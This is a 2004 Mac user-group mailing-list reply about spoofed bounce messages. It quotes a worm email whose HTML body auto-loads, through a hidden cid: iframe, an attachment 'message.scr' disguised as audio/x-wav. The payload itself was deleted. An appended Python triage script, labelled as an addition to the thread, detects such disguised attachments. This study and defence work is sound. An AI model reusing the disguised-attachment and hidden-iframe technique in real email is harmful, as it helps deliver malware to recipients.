[muglo] Re: Suspicious email activity

  • From: Regina Satorius <regina@xxxxxxxxxxx>
  • To: Muglo <muglo@xxxxxxxxxxxxx>
  • Date: Wed, 10 Nov 2004 15:01:44 -0500

on 11/9/04 6:59 PM, Eric D at hideme666@xxxxxxxxxxx wrote:

> Can you please send me a copy of said "spammer/spoofer" virus?
> 
> I haven't read the first few messages of this thread yet but it sounds like
> a typical spammer/virus that's operating on ANOTHER computer. What
> happens is that your e-mail address is used as a fake "From" address by
> either a spammer or by a virus that has infected a WINDOWS user's computer
> (NOT Macintosh... it'd be neat if it was a Mac though) and is sending out
> e-mails that get bounced. And, when they get bounced they are sent to the
> from/reply-to address which is your address.
> 
> I have addressed this before on this mailing list as have others and am
> feeling like a bit of a broken record. To date NO computer viruses (NOT
> viri) are known to on Mac OS X.
> 
> Eric.
> 
 
Eric, I don't get a lot of these, but here is the front portion of a recent
strange, very long message that supposedly "bounced" back to me but I didn't
send it: 

It came from: <MAILER-DAEMON@xxxxxxxxxxxxxxxxxxxx>
Subject was: failure notice

Hi. This is the qmail-send program at smtp4.tidc.telus.com.
I'm afraid I wasn't able to deliver your message to the following addresses.
This is a permanent error; I've given up. Sorry it didn't work out.

<harveym@xxxxxxxxxxxxx>:
Sorry, I wasn't able to establish an SMTP connection. (#4.4.1)
I'm not going to try again; this message has been in the queue too long.

--- Below this line is a copy of the message.

Return-Path: <regina@xxxxxxxxxxx>
Received: (qmail 3973 invoked from network); 8 Nov 2004 14:56:19 -0000
Received: from pc-207-239.scpe.quickclic.net (HELO castle-ed.com)
(24.244.207.239)
  by relay.tidc.telus.com with SMTP; 8 Nov 2004 14:56:19 -0000
From: regina@xxxxxxxxxxx
To: harveym@xxxxxxxxxxxxx
Subject: Mail Delivery (failure harveym@xxxxxxxxxxxxx)
Date: Mon, 8 Nov 2004 09:56:39 -0500
MIME-Version: 1.0
Content-Type: multipart/related;
    type="multipart/alternative";
    boundary="----=_NextPart_000_001B_01C0CA80.6B015D10"
X-Priority: 3
X-MSMail-Priority: Normal

This is a multi-part message in MIME format.

------=_NextPart_000_001B_01C0CA80.6B015D10
Content-Type: multipart/alternative;
    boundary="----=_NextPart_001_001C_01C0CA80.6B015D10"

------=_NextPart_001_001C_01C0CA80.6B015D10
Content-Type: text/plain;
    charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

------=_NextPart_001_001C_01C0CA80.6B015D10
Content-Type: text/html;
    charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Diso-8859-1" =
http-equiv=3DContent-Type>
<META content=3D"MSHTML 5.00.2920.0" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>If the message will not displayed automatically,<br>
follow the link to read the delivered message.<br><br>
Received message is available at:<br>
<a href=3Dcid:031401Mfdab4$3f3dL780$73387018@57W81fa70Re height=3D0
width=3D0>www.castle-ed.com/inbox/harveym/read.php?sessionid-27930</a>
<iframe
src=3Dcid:031401Mfdab4$3f3dL780$73387018@57W81fa70Re height=3D0
width=3D0></iframe>
<DIV>&nbsp;</DIV></BODY></HTML>

------=_NextPart_001_001C_01C0CA80.6B015D10--

------=_NextPart_000_001B_01C0CA80.6B015D10
Content-Type: audio/x-wav;
    name="message.scr"
Content-Transfer-Encoding: base64
Content-ID:<031401Mfdab4$3f3dL780$73387018@57W81fa70Re>
....and a whole lot more garbage I deleted.

_________________________________________________

For information concerning the MUGLO List just click on

           http://muglo.on.ca/Pages/joinus.html

Our Archives can be viewed at 

         //www.freelists.org/archives/muglo

Don't forget to periodically check our web site at:

                 http://muglo.on.ca/
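
An added example, not part of the original thread: one way to triage a returned copy like the one quoted above, reading the connecting host that the accepting relay recorded in `Received` and flagging an attachment whose declared media type hides an executable name and is pulled in by a `cid:` iframe. The names `triage`, `EXEC_EXT` and `SAMPLE` are hypothetical, the extension list is an assumed short list, and the sample is constructed from the quoted headers with a placeholder sender and a dummy payload.

```python
import email
import re
from email import policy

# Constructed sample modelled on the quoted bounce: same Received line and MIME
# layout, placeholder From address, shortened Content-ID, dummy payload.
SAMPLE = b"""\
Received: from pc-207-239.scpe.quickclic.net (HELO castle-ed.com) (24.244.207.239)
  by relay.tidc.telus.com with SMTP; 8 Nov 2004 14:56:19 -0000
From: regina@example.org
Content-Type: multipart/related; boundary="B0"

--B0
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<iframe src=3Dcid:att1@sample height=3D0 width=3D0></iframe>

--B0
Content-Type: audio/x-wav; name="message.scr"
Content-Transfer-Encoding: base64
Content-ID: <att1@sample>

AAAA
--B0--
"""

EXEC_EXT = (".scr", ".pif", ".exe", ".com", ".bat")  # assumption: short list

def triage(raw: bytes) -> dict:
    msg = email.message_from_bytes(raw, policy=policy.default)
    out = {"source": None, "disguised": [], "auto_loaded": []}
    # From is whatever the sender typed; the top Received line is the relay's own record.
    m = re.search(r"from\s+(\S+)\s+\(HELO\s+(\S+)\)\s+\(([\d.]+)\)",
                  msg.get_all("Received", [""])[0])
    if m:
        out["source"] = m.groups()  # (reverse DNS name, HELO name, IP)
    html, by_cid = "", {}
    for part in msg.walk():
        name = part.get_filename()  # falls back to Content-Type name=
        if part.get_content_type() == "text/html":
            html += part.get_content()
        elif name:
            by_cid[(part["Content-ID"] or "").strip("<> ")] = name
            if name.lower().endswith(EXEC_EXT) and part.get_content_maintype() in ("audio", "image", "video"):
                out["disguised"].append((name, part.get_content_type()))
    # Attachments the HTML body loads by itself through a cid: iframe
    cids = re.findall(r"<iframe[^>]+src=[\"']?cid:([^\s\"'>]+)", html, re.I)
    out["auto_loaded"] = [by_cid[c] for c in cids if c in by_cid]
    return out
```

Comparing the returned `source` tuple with your own provider's hosts shows whether the message ever left your machine.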
